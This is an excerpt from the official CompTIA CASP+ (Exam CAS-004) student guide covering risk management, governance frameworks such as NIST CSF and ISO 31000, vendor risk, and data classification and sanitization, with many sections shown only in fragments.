Official CompTIA CASP+ Student Guide
Official CompTIA CASP+ Student Guide
CompTIA
CASP+
Student Guide
(Exam CAS-004)
Course Edition: 1.0
Acknowledgments
Notices
Disclaimer
While CompTIA, Inc. takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy,
and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of
merchantability or fitness for a particular purpose. The use of screenshots, photographs of another entity's products, or
another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by nor any affiliation of such entity with CompTIA. This courseware may contain links
to sites on the Internet that are owned and operated by third parties (the "External Sites"). CompTIA is not responsible for
the availability of, or the content located on or through, any External Site. Please contact CompTIA if you have any concerns
regarding such links or External Sites.
Trademark Notice
CompTIA®, CASP+®, and the CompTIA logo are registered trademarks of CompTIA, Inc., in the U.S. and other countries. All
other product and service names used may be common law or registered trademarks of their respective proprietors.
Copyright Notice
Copyright © 2021 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed
in any form or by any means, or stored in a database or retrieval system, without the prior written permission of CompTIA,
3500 Lacey Road, Suite 100, Downers Grove, IL 60515-5439.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software
or other products is the responsibility of the user according to terms and conditions of the owner. If you believe that this
book, related materials, or any other CompTIA materials are being reproduced or transmitted without permission, please call
1-866-835-8020 or visit https://help.comptia.org.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Table of Contents | iii
Table of Contents
Topic 5C: Analyze Access Control Models & Best Practices............................ 120
Table of Contents
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
iv | Table of Contents
Solutions......................................................................................................................... S-1
Glossary ..........................................................................................................................G-1
Table of Contents
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
1
About This Course
CompTIA is a not-for-profit trade association with the purpose of advancing the
interests of IT professionals and IT channel organizations; its industry-leading IT
certifications are an important part of that mission. CompTIA's CASP+ Certification
is an advanced skill level cybersecurity certification designed for professionals with
10 years of general hands-on IT experience, with at least five of those years being
broad hands-on IT security experience.
This exam will certify the successful candidate with the technical knowledge and
skills required to architect, engineer, integrate, and implement secure solutions
across complex environments to support a resilient enterprise while considering the
impact of governance, risk, and compliance requirements.
CompTIA CASP+ Exam Objectives
Course Description
Course Objectives
This course can benefit you in two ways. If you intend to pass the CompTIA CASP+
(Exam CAS-004) certification examination, this course can be a significant part of
your preparation. But certification is not the only key to professional success in the
field of cybersecurity. Today's job market demands individuals have demonstrable
skills, and the information and activities in this course can help you build your
information security skill set so that you can confidently perform your duties as an
advanced security practitioner.
On course completion, you will be able to:
• Perform risk management activities.
Target Student
The Official CompTIA CASP+ Guide (Exam CAS-004) is the primary course you will
need to take if your job responsibilities include risk management, enterprise
security operations, security engineering and security architecture, research and
collaboration, and integration of enterprise security. You can take this course to
prepare for the CompTIA CASP+ (Exam CAS-004) certification examination.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
vi | Preface
Prerequisites
To ensure your success in this course, you should have minimum of ten years
of general hands-on IT experience, with at least five of those years being broad
hands-on IT security experience. CompTIA Network+, Security+, CySA+, Cloud+, and
PenTest+ certification, or the equivalent knowledge, is strongly recommended.
The prerequisites for this course might differ significantly from the prerequisites for
the CompTIA certification exams. For the most up-to-date information about the exam
prerequisites, complete the form on this page: www.comptia.org/training/resources/
exam-objectives.
As You Learn
At the top level, this course is divided into lessons, each representing an area of
competency within the target job roles. Each lesson is comprised of a number of
topics. A topic contains subjects that are related to a discrete job task, mapped
to objectives and content examples in the CompTIA exam objectives document.
Rather than follow the exam domains and objectives sequence, lessons and topics
are arranged in order of increasing proficiency. Each topic is intended to be studied
within a short period (typically 30 minutes at most). Each topic is concluded by one
or more activities, designed to help you to apply your understanding of the study
notes to practical scenarios and tasks.
Additional to the study content in the lessons, there is a glossary of the terms and
concepts used throughout the course. There is also an index to assist in locating
particular terminology, concepts, technologies, and tasks within the lesson and
topic content.
In many electronic versions of the book, you can click links on key words in the topic
content to move to the associated glossary definition, and on page references in the
index to move to that term in the content. To return to the previous location in the
document after clicking a link, use the appropriate functionality in your eBook viewing
software.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Preface | vii
As You Review
Any method of instruction is only as effective as the time and effort you, the
student, are willing to invest in it. In addition, some of the information that you
learn in class may not be important to you immediately, but it may become
important later. For this reason, we encourage you to spend some time reviewing
the content of the course after your time in the classroom.
Following the lesson content, you will find a table mapping the lessons and topics to
the exam domains, objectives, and content examples. You can use this as a checklist
as you prepare to take the exam, and review any content that you are uncertain
about.
As a Reference
The organization and layout of this book make it an easy-to-use resource for future
reference. Lesson summaries can be used during class and as after-class references
when you're back on the job and need to refresh your understanding. Taking
advantage of the glossary, index, and table of contents, you can use this book as a
first source of definitions, background information, and explanation of concepts.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 1
Performing Risk Management
Activities
1
LESSON INTRODUCTION
Risk is all around us. Sometimes risk is obvious and easy to identify, but many times
it is less obvious and demands careful analysis to properly identify. As organizations
grow and adapt to changing needs and strategic objectives, these adaptations
present new and evolving risk challenges. It is imperative to understand how
to identify and measure risk in order to formulate prioritized approaches for
managing it. In this lesson, we will frame risk from the viewpoint of an advanced
security practitioner and explore various mechanisms designed to assist us in
the identification and evaluation of risk and the essential components of a risk
management strategy.
Lesson Objectives
In this lesson, you will:
• Understand the role of Risk Management.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
2 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 1A
Explain Risk Assessment Methods
2
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 3
Measuring Risk
Risk is a measure of the impact (or consequence) and likelihood of a threat
exploiting a vulnerability. To measure risk, it is essential to first identify known,
existing vulnerabilities and then evaluate the impacts realized by their exploitation.
Two additional, and critically important, variables considered in evaluating risk
are likelihood and impact. Some risks may be highly likely, or very probable, but
minimally impactful, and yet others may be incredibly impactful but very unlikely,
sometimes described as “statistically improbable” or as a “black swan event.” These
considerations play an important part in ranking and prioritizing risks in order to
appropriately focus financial and human resources in the most effective ways.
Likelihood of occurrence is the probability of the threat being realized.
Impact is the severity of the risk if realized. This may be determined by factors such
as the scope, the value of the asset, or the financial impacts of the event.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
4 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Risk Responses
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 5
Avoid
Risk avoidance means that you stop doing the activity that is risk-bearing. For
example, a company uses an in-house web application for managing inventory.
If the application is discovered to have numerous high-severity security
vulnerabilities, the company may decide that the cost of maintaining the application
is not worth the benefit it provides and decide to decommission it.
Accept
Risk acceptance means that an identified risk area has been evaluated and this
resulted in an agreement to continue operating the software, hardware, processes,
actions, or other type of similar tasks, despite the identified risks.
There is risk in all we do, even simple tasks in day to day life involve risks, but
despite this, we are still productive and largely safe so long as we are aware of risks
and act within safe limits. At some point, identified risks must all be accepted. It is
the task of risk management to help contain risks within carefully constructed and
mutually agreed-upon boundaries because risk cannot be eliminated.
Mitigate
Risk mitigation is the overall process of reducing exposure to, or the effects of, risk
factors. This is where the work of risk management really comes into focus. As risks
are identified, we must address them in a measured way. As security practitioners,
we are tasked with making technical business operations safe. This is accomplished
through the implementation of mitigating controls. For example, when considering
web applications, the number of potential security issues is long but the need for
the web application is identified as essential or critical to the business, and so we
must determine ways in which the web application can be operated as safely as
possible while still meeting the needs of the business. To do this we use various
means to improve the safety and security of the web application through the
implementation of mitigating controls.
By implementing effective mitigating controls we can reduce the overall risk. We
continue to implement mitigating controls until risk is reduced to a level deemed
“acceptable.”
Transfer
Risk transference (or sharing) means assigning risk to a third party, which is
most typically exemplified through the purchase of an insurance policy. Insurance
transfers financial risks to a third party. This is an important strategy as the cost of
data breaches, and other cybersecurity events, can be extremely high and result in
bankruptcy.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
6 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Residual Risk
Where inherent risk is the risk before mitigation, residual risk is the likelihood
and impact after specific mitigation, transference, or acceptance measures have
been applied. Risk appetite is a strategic assessment of what level of residual risk
is tolerable for an organization. Some organizations, like a start-up for example,
have very high risk appetites. Everything about a start-up involves risk and so the
threshold by which risk is measured will be categorically different than how risk is
measured at a 200 year-old insurance company.
It is important to note that residual risk and acceptable risk are not always equivalent. It
might be that a certain identified risk area cannot be mitigated to an acceptable level.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 7
Review Activity:
3
Risk Management
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
8 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 1B
Summarize the Risk Life Cycle
5
It is essential that risks are formally identified and documented so that they can
be properly analyzed and prioritized by leadership teams. There are many risks to
consider but only a finite set of resources available to address them. Through the
clear identification, analysis, and prioritization of risk, the most pressing risk items
can be addressed and, by focusing the work effort on the most pressing items, the
organization’s overall risk level can be more effectively reduced.
Risk management describes the set of policies and processes used by an
organization to help it locate, describe, prioritize, and mitigate risks in a
consistent and repeatable way. Put another way, risk management formalizes
the identification and control of risks. Formalizing the risk management process
ensures that all stakeholders are aware of existing risks, the potential impacts these
risks may impose, and also the agreed upon methods used to mitigate them.
NIST CSF
The NIST Cybersecurity Framework is an incredibly popular framework and is widely
adopted in the United States. The NIST CSF helps organizations define five core
functions within a cybersecurity program.
The five core functions are:
1. Identify
2. Protect
3. Detect
4. Respond
5. Recover
In addition, the NIST CSF defines several required steps when performing risk
management.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 9
2. Orient
More details regarding the NIST CSF can be obtained via: https://www.nist.gov/itl/
smallbusinesscyber/nist-cybersecurity-framework
NIST RMF
The NIST RMF defines standards that US Federal Agencies must use to assess and
manage cybersecurity risks. NIST RMF defines several distinct steps required in an
effective risk management program.
The RMF steps are:
1. Prepare
2. Categorize
3. Select
4. Implement
5. Assess
6. Authorize
7. Monitor
More details regarding the NIST RMF can be obtained via: https://www.nist.gov/
cyberframework/risk-management-framework
ISO 31000
The International Organization for Standardization is one of the world’s largest
developers of standards. ISO standards are adopted by many international
organizations to establish a common taxonomy among diverse industries. ISO
31000, also known as ISO 31k, is a very comprehensive framework and considers
risks outside of cybersecurity, including risks to financial, legal, competitive, and
customer service functions.
More details regarding ISO 31000 can be obtained via: https://www.iso.org/iso-
31000-risk-management.html
COBIT
A framework created and maintained by ISACA, the Control Objectives for
Information and Related Technologies frames IT risk from the viewpoint of business
leadership. The COBIT framework is composed of five major components:
1. Framework
2. Process descriptions
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
10 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
3. Control objectives
4. Management guidelines
5. Maturity models
COSO
The Committee of Sponsoring Organizations of the Treadway Commission,
or COSO, is an initiative of five private sector organizations collaborating on
the development of risk management frameworks. The Enterprise Risk
Management — Integrated Framework defines an approach to managing risk from
a strategic leadership point of view.
More details can be obtained via: https://www.coso.org/Pages/default.aspx.
Risk constantly evolves and shifts due to many factors such as changes in an
organization’s strategy, changes within the industry, changes by vendor partners,
and changes in the software and platforms used on a daily basis. Due to the
dynamic nature of risk, it must be managed on a continual basis.
Risk management tasks are defined by a life cycle. The four major phases common
to all risk management life cycles include:
• Identify—This phase includes the identification of risk items.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 11
People
Those who perform the work in an organization. People ultimately are the ones
most directly impacted by technology. What sounds great on paper may not work
well in practice and this can result in unintended consequences - such as increased
calls to the help desk and/or drops in productivity. People are more likely to bypass
security controls when they are overly burdensome and/or are implemented
without adequate training on their purpose and proper use.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
12 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Processes
All important work must be defined and described in a process. The process
should include detailed descriptions of the necessary steps required to successfully
complete a task. Processes, just like instructions, drive consistency and reliability
and remove doubt and individual interpretations when completing a task. In
addition, processes should be periodically analyzed to ascertain that they are being
used consistently and that the outputs match expectations.
Technology
Technology alone does not solve any problems. Ultimately, technology needs the
people and processes in place around it in order for it to be effective. Only after
careful consideration of requirements and need should technology be selected.
Identify
This function involves the analysis and management of organizational risks.Risks
can be realized in many areas, including people, data, systems and processes and
this process works to help an organization locate, describe and analyze these risks
in order to develop a prioritized approach to their management.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 13
Protect
This function describes the capabilities needed to ensure consistent operation of all
critical business functions and limit the impacts of any adverse events.
Detect
This function defines the capabilities needed for the timely discovery of security
incidents.
Respond
This function seeks to limit the impact of a cybersecurity incident by defining
appropriate actions to be taken upon its discovery.
Recover
This function defines the necessary activities for restoring any disrupted service to
their original, or intended state, following a cybersecurity incident.
More details regarding the five functions of the NIST CSF can be obtained via:
https://www.nist.gov/cyberframework/online-learning/five-functions
The iterative process of risk management includes periodic reviews of the risk register in
order to determine the implementation status of each item - for example, analyzing the
extent to which the identified controls have been implemented since the last review.
Risk Register
First identified as an effective tool in the ISO 27001 standard, risk registers
provide an effective visualization of identified risks and include descriptions and
information about mitigating controls. It can be considered as the most recognized
output of the risk management program. The creation of the risk register requires
collaboration between many departments and should be considered a working
document, meaning it is never “completed.”
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
14 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Below is an example of a risk register. The examples included are for illustrative
purposes only as each item should be evaluated and ranked differently from one
organization to another.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 15
Scalability
Scalability refers to the capability of a system to handle increases in workload.
A system that scales well can easily adapt to increases in workload in order to
maintain a consistent level of performance.
Reliability
Reliability refers to a capability of a system to perform without error and describes
a system that includes features to avoid, detect, and/or repair component failures.
Availability
Availability describes the probability that a system will be operating as expected at
any given point in time. Availability is typically measured as “uptime.”
Sometimes, as is the case for the financial sector, a formal cyber risk appetite statement
must be adopted to describe the amount of risk the organization is willing to accept in
order to accomplish its mission.
Risk Tolerance
Risk tolerance defines the thresholds that separate different levels of risk.
Thresholds may be defined by money, impact, scope, time, compliance, and privacy,
and describe the level of risk acceptable in order to achieve a goal.
Tradeoff Analysis
Tradeoff analysis describes how decisions are made after reviewing risks and
rewards, by comparing potential benefits to potential risks, and determining a
course of action based on adjusting factors that contribute to each area. The
Software Engineering Institute (SEI) at Carnegie Mellon University developed the
Architecture Tradeoff Analysis Method (ATAM), which allows formal evaluation of
architectures based upon the analysis of risks and desired outcomes.
A practical example of tradeoff analysis also includes the constant battle between
usability versus security requirements. Establishing a balance between “secure”
and “usable” can be difficult. By over-accommodating one factor the other is
compromised. Put differently, implementing the highest levels of security in all
scenarios will result in unintended consequences. When considering usernames
and passwords for example, very long and complex password requirements often
result in lost productivity and high call volumes to the help desk.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
16 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Employment Policies
The following strategies are designed to reduce the likelihood of fraud and limit the
impacts of insider threat.
Separation of Duties
Separation of duties is a means of establishing checks and balances against the
possibility that critical systems or procedures can be compromised by insider
threats. Duties and responsibilities should be divided among individuals to prevent
ethical conflicts or abuse of powers.
Job Rotation
Job rotation (or rotation of duties) means that no one person is permitted to remain
in the same job for an extended period. For example, managers may be moved to
different departments periodically, or employees may perform more than one job role,
switching between them throughout the year. Rotating individuals into and out of roles,
such as the firewall administrator or access control specialist, helps an organization
ensure that it is not tied too firmly to any one individual because vital institutional
knowledge is spread among trusted employees. Job rotation also helps prevent abuse
of power, reduces boredom, and enhances individuals’ professional skills.
Mandatory Vacation
Mandatory vacation means that employees are forced to take their vacation time,
during which someone else fulfills their duties. The typical mandatory vacation
policy requires that employees take at least one vacation a year in a full-week
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 17
increment so that they are away from work for at least five days in a row. During
that time, the corporate audit and security employees have time to investigate and
discover any discrepancies in employee activity.
Least Privilege
Least privilege means that a user is granted sufficient rights to perform his or her job
and no more. This mitigates risk if the account should be compromised and fall under
the control of a threat actor. Authorization creep refers to a situation where a user
acquires more and more rights, either directly or by being added to security groups
and roles. Least privilege should be ensured by closely analyzing business workflows to
assess what privileges are required and by performing regular account audits.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
18 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
6
The Risk Life Cycle
Answer the following questions:
2. This phase of the risk management life cycle identifies effective means
by which identified risks can be reduced.
4. This function of the NIST CSF defines capabilities needed for the timely
discovery of security incidents.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 19
Topic 1C
Assess & Mitigate Vendor Risk
6
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
20 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
The shared responsibility model describes the relationship between customer and CSP.
Security Responsibilities
In general terms, the responsibilities between customer and cloud provider include
the following areas:
Cloud Service Provider
• Physical security of the infrastructure
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 21
• Configuring the geographic location for storing data and running services
Additional Resources
NIST Cloud Computing Reference Architecture SP 500-292
https://www.nist.gov/publications/nist-cloud-computing-reference-architecture
Microsoft Shared Responsibility for Cloud Computing (White Paper)
https://azure.microsoft.com/en-us/resources/shared-responsibility-for-cloud-
computing/
Cloud Security Alliance Shared Responsibility Model Explained
https://cloudsecurityalliance.org/blog/2020/08/26/shared-responsibility-model-
explained/
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
22 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
• Support Availability—Defines the steps taken to verify the type and level of
support to be provided by the vendor in support of their product or service. It
is common for support performance and maintenance fees to be defined via
a service level agreement (SLA.) Definitions contained within the description
of support services should include details regarding how to obtain support,
response times, level of support (for example the boundary between product
support and professional services engagements), from what location support
services will be provided, descriptions regarding escalation, the use of account
managers, and other related items.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 23
Geographical Considerations
Globalization
Organizations are very likely to use multiple vendors located in many geographically
diverse locations across the world. Globalization of the economy is a fascinating and
dynamic topic, and in terms of cybersecurity presents many unique challenges. The
most apparent issues when working with a vendor located in a different country
include time zone differences, language barriers, social and moral norms, as well
as legal jurisdiction. It is the latter issue that becomes much more pressing when
considering the use of cloud service providers. While a more straightforward vendor
relationship requires careful management of team interactions and the governance
of data access, remote access, contracts and service level agreements, cloud service
providers increase the complexities and risk of geographical considerations in a
very unique way.
A cloud service provider arrangement requires an organization to relocate its
core information technology applications, data, and infrastructure to the CSP.
Handing over much of the control of these items presents many tactical risks, but
from a geographic viewpoint, legal jurisdiction becomes much more complicated
as the customer and CSP are most often located in different cities, regions, and/
or countries. Determining which laws are applicable in various scenarios, defining
boundaries around how and where cloud services can be provisioned, and training
staff on these requirements becomes much more critical.
The United States, Europe, Asia, South and Central America, Australia, and New
Zealand all have divergent laws protecting intellectual property, privacy, the use of
encryption, and law enforcement cooperation.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
24 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 25
Supply Chain Visibility (SCV) - Describes the capacity to understand how all vendor
hardware, software, and services are produced and delivered as well as how they
impact an organization’s operations or finished products. This is a daunting task, as
full visibility requires a comprehensive understanding of all levels of the supply chain,
to include the vendors and suppliers of an organization’s vendors and suppliers - or
put another way, the 1st, 2nd, 3rd,... nth level suppliers in the supply chain.
Third-Party Dependencies
Supply chain generally refers to the use and distribution of materials comprising
a finished product. Third-parties form part of the supply chain but describe a far
broader set of relationships such as vendors, suppliers, service providers, credit card
processors, utilities, contractors, affiliates, trade associations, government agencies,
and many others. Understanding and documenting these relationships, including
an assessment of the level of risk the third-party poses to the organization can help
identify sources of trouble. Some elements specific to securing IT operations include
identifying the code, hardware, and modules used within the environment and
provided by third-parties. These elements can introduce vulnerabilities and should be
assessed to determine their security level and capabilities.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
26 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Network Segmentation
Vendor products and/or the systems managed by vendors should be sufficiently
isolated from the rest of the organization’s environment to provide a distinct
containment layer for any exploitable vulnerabilities within the vendor product
and also to limit the vendor’s access to the larger network. Segmentation can
be performed logically, for example implementing virtual local area networks
(VLAN), or physically, for example separating networks and communications at the
equipment level. Network segmentation designs should be periodically re-evaluated
to verify they are still operating as originally designed.
Transmission Control
Transmission control defines how communication channels are protected from
infiltration, exploitation, and interception. Accomplished by many mechanisms,
transmission control can be realized through the application of access control lists
and rules on network equipment, limiting host and protocol access to essential
components only, mutual authentication, and encryption.
Shared Credentials
In order for vendor software and vendor support staff to work in an organization’s
environment, credentials will need to be provisioned. Some credentials will be
associated with software and services and others assigned to individuals. It is
imperative to maintain a one-to-one relationship between vendor employees
and credentials in order to establish clear accountability and an effective means
to revoke individual access. In addition, credentials associated with software and
services should be provisioned in a way that prevents them from being used as a
standard account, for example by removing the ability for the account to obtain an
“interactive logon” in Microsoft Windows.
An example of shared credentials are those provisioned and provided for any
vendor support staff to use. While this is convenient, it becomes practically
impossible to determine precisely who at the vendor location accessed a system
and performed specific actions. In addition, creating shared credentials in this
way fosters a lax security mindset as there is a lack of enforceable accountability.
Furthermore, vendor support may create shared credentials within the equipment
and/or software they support in order to more easily allow staff to quickly access
these items and provide support. Frequently, these credentials are used at all
vendor customer locations and a breach at any vendor customer site can result in
the theft of these credentials, which in-turn provide access to all vendor customer
locations.
Use of vendor credentials must be well-governed, and carefully monitored. Ideally,
vendor credentials should require multi-factor authentication, be disabled by
default, and only enabled for the duration required to provide support.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 27
Review Activity:
7
Vendor Risk
Answer the following questions:
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
28 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Lesson 1
Summary
6
Key Takeaways
• Risk management requires the involvement of inter-departmental groups.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 2
Summarizing Governance &
Compliance Strategies
1
LESSON INTRODUCTION
The development of a cybersecurity program can follow many paths, but
ultimately the path to follow is most often determined by agencies external to
the organization. Determining which external agency dictates the components of
the cybersecurity program is critically important. Many times there are multiple
external agencies with authority to dictate which controls are in place. This lesson
will describe many of the common elements found in external mandates and also
describe some of the distinguishing characteristics of the most common ones.
Lesson Objectives
In this lesson, you will:
• Learn about the challenges of integration.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
30 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 2A
Identifying Critical Data Assets
2
The legal and regulatory environment play an especially important role in the
selection, development, and management of a cybersecurity program. By many
measures, industry is shaped and directed by the legal environment in which it
operates. The legal and regulatory environment serve as a means to both protect
and prosecute organizations. Failure to understand and utilize the legal and
regulatory environment can lead to lawsuits, criminal prosecution, jail, crippling
fines, and other serious consequences. In contrast to this, and when incorporated
in a strategic way, the legal and regulatory environment can provide operational
advantages and support the ongoing sustainability of the organization.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 31
Health
Health data covers a wide range of information and includes not only patients
but also doctors and health care systems. Protected Health Information (PHI)
describes data that can be used to identify an individual and includes information
about past, present, or future health, as well as related payments and data used in
the operation of a healthcare business.
Financial
In the broadest terms, financial information describes items such as payment
history, credit ratings, and financial statements. Personal Identifiable Financial
Information (PIFI) describes information about a consumer provided to a financial
institution and includes information such as account number, credit/debit card
number, personal information (such as name and contact information), and social
security number. Generally, PIFI is used to obtain access to a financial product or
service.
Intellectual Property
Intellectual property (IP) describes intangible products of human thought and
ingenuity. Intellectual property is protected by various laws such as copyrights,
patents, trademarks, and trade secrets. Intellectual property often represents vast
sums of investment money and research time and provides significant competitive
or military advantage.
The data owner is typically non-technical and depends upon extensive collaborative
effort with the information technology team in order to fully understand the risks to the
confidentiality, integrity, and availability of the data for which they are accountable.
Data Classification
Data classification establishes the necessary controls, such as security
configurations, encryption, access controls, procedures, and physical security
required in order to adequately protect data. Data classifications are typically
defined by three levels, and the names of the three levels can vary from
organization to organization. Classifications levels can be defined for more
than three levels, as required, but doing so can add significant complexity to its
management.
Some common classification levels for private-sector organizations include:
• Public—Disclosure would not cause a negative impact to the organization.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
32 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Data Retention
Data retention defines the timespan for which data must be kept. Retention
defines not only the minimum amount of time data must be kept but also the
maximum (or “no longer than”) timespan. Data retention requirements are often
identified in data classification levels but the specific details should be defined in
separate data retention policies and procedures. Effective data retention mitigates
the potential issues surrounding data loss but also, and more frequently, for
ongoing and future litigation.
The impacts of inadequate data retention practices are often devastating. In light
of this, it is essential to frequently evaluate compliance with data retention policies
and perform validation exercises to test their effectiveness and the capabilities of
those responsible for maintaining the data.
Sanitization
A general term describing the means by which information is removed from media
and includes methods such as clear, purge, and damage. Additionally, sanitization
requires the removal of all labels, markings, and activity logs.
Crypto Erase
Refers to the sanitization of the key used to perform decryption of data, making
recovery of the data effectively impossible.
Crypto erase is particularly important when considering cloud platforms where the data
is stored on a device and in a location inaccessible to the owner.
Clear
A type of sanitization that involves multiple block-level overwrite cycles. This
approach protects the data from being recovered from all recovery methods except
those that include clean-room type procedures performed at the materials level.
Purge
A type of sanitization that provides effective protection from all recovery
techniques, including clean-room methods.
Damage
Physically breaking a storage device to render it useless or inoperable.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 33
Attestation of Compliance
An attestation of compliance (AOC) describes the set of policies, contracts,
and standards identified as essential in the agreement between two parties. The
attestation of compliance essentially defines how the relationship will be governed.
For example, the procurement of services, data protection requirements, privacy
protection requirements, use of independent auditors and assessors, incident
reporting, and definitions of what constitutes a violation must all be documented
and agreed upon.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
34 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Critical Data Assets
3
1. True or False. The use of cloud service providers always reduces risk.
5. Which concept identifies that the laws governing the country in which
data is stored have control over the data?
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 35
Topic 2B
Compare and Contrast Regulation,
Accreditation, and Standards
6
Regulations and standards are tightly integrated. Regulations establish the legal
basis for enforcing compliance with a set of rules and describe the consequences
for non-compliance. It is common for regulations to refer to externally published
standards when identifying the specific requirements for compliance with the law.
This separation allows the best practices described in a standard to be continuously
updated and improved in response to the rapid development and changes in the
cybersecurity field without the need for legislative action to adopt the changes.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
36 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
some of the most widely adopted and referenced materials in the industry. More
information regarding NIST cybersecurity publications can be obtained via: https://
www.nist.gov/cybersecurity.
The acronym for ISO can be a source of confusion. Due to its international scope,
International Organization for Standardization translates into many different languages
and would require many different acronyms. To address this, ISO is used and reflects
the Greek work 'isos' which means 'equal.'
• Purpose limitation
• Data minimization
• Accuracy
• Storage limitation
• Accountability
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 37
• Level 2: Managed—Many work activities are defined via processes but work is
still frequently reactive in nature.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
